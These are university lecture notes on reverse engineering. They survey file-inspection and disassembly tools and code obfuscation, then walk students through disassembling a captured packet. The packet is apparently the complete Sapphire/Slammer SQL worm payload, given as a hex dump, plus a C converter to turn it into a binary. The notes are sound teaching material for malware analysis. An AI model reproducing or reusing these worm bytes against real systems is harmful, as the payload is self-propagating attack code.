Decompilation / Reverse Engineering
CS 493/693 Lecture,
Dr. Lawlor, 2006/04/14
Tools for finding out about what's in a file include:
- ls / dir: file size, ownership, last-change date
- UNIX "file" command: guessed contents, by looking at first few bytes
- ASCII dump tools, like UNIX "strings" command (find ASCII-like strings) and text editors
- Binary file display tools, like my Linux file_display tool.
- Hex dump tools, like UNIX "od" (try "od -A x -t x1 myFile.bin | less" to get a hex dump), or the excellent Windows XVI32, which is also a hex editor.
Executable code disassembly tools include:
- UNIX "ldd" will dump dynamic library information about a program.
- UNIX
"objdump -drC myFile.bin" will disassemble valid executables.
"objdump -R myFile.bin" will list subroutines loaded from dynamic
libraries.
- "ndisasm -u myFile.bin" will disassemble *any* file, even ASCII
text. The dissasembly is bogus if the input isn't as expected,
though.
- Boomerang is a not-quite-functional free decompiler,
theoretically taking a binary and spitting out C code. Execellent
decompilers exist for bytecode languages like .NET and Java, but are
still primitive for real compiled code. Even when they work
properly, decompilers spit out uncommented spaghetti code with bogus
variable names, so use with a grain of salt. There's a good summary of Reverse Engineering technology at backerstreet.
- Any decent debugger includes a disassembly tool. In particular,
the UNIX debugger GDB can be run on any piece of compiled code and yet
still:
- Set breakpoints at an address with "break *0x0804e17a" (note the silly star)
- Show registers with "info registers"
- Disassemble starting at an address with "disassemble 0x804e17a"
- Dump memory to a raw binary file with "dump memory myFile.bin 0x804e17a 0x804efff"
- This can be useful to grab a malicious program's data
"in-flight", even if it's encrypted or somehow obfuscated while on disk
or on the network.
Executable code can be obfuscated in a variety of ways:
- The classic way is to "encrypt" by XORing the machine code with
some random value, like 0x7F. The first part of the code is a
tiny loop that decrypts the rest of the code.
- Many Trojan-horse programs now use some variant of UPX encoding to hide their contents.
You can generate your own disassembly by starting with a packet trace:
[**] MS-SQL Worm propagation attempt [**]
03/05-22:53:11.590537 0:7:84:B8:3:FC -> 0:11:85:82:46:CC type:0x800 len:0x1A2
222.144.66.194:1031 -> 137.229.25.215:1434 UDP TTL:108 TOS:0x0 ID:23862 IpLen:20 DgmLen:404
Len: 376
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p.
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h..
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5.
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt.
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP..
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P.
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j..
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P
8B 45 AC 50 FF D6 EB CA .E.P....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Now use a text editor to clip off the ascii, leaving only hex (nedit's ascii-art-rectangle control-select is really useful here)
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50
8B 45 AC 50 FF D6 EB CA
Now use a little program like this to convert the hex to a binary file,
like "converter < packet.hex > packet.bin".
#include <stdio.h>
int main() {
int i;
while (1==scanf("%02x",&i)) {
unsigned char c=(unsigned char)i;
fwrite(&c,1,1,stdout);
}
return 0;
}
You can now disassemble the binary file with any disassembler, like "ndisasm -u packet.bin".
Check out this Disassembly of the Sapphire worm like
we looked over in class.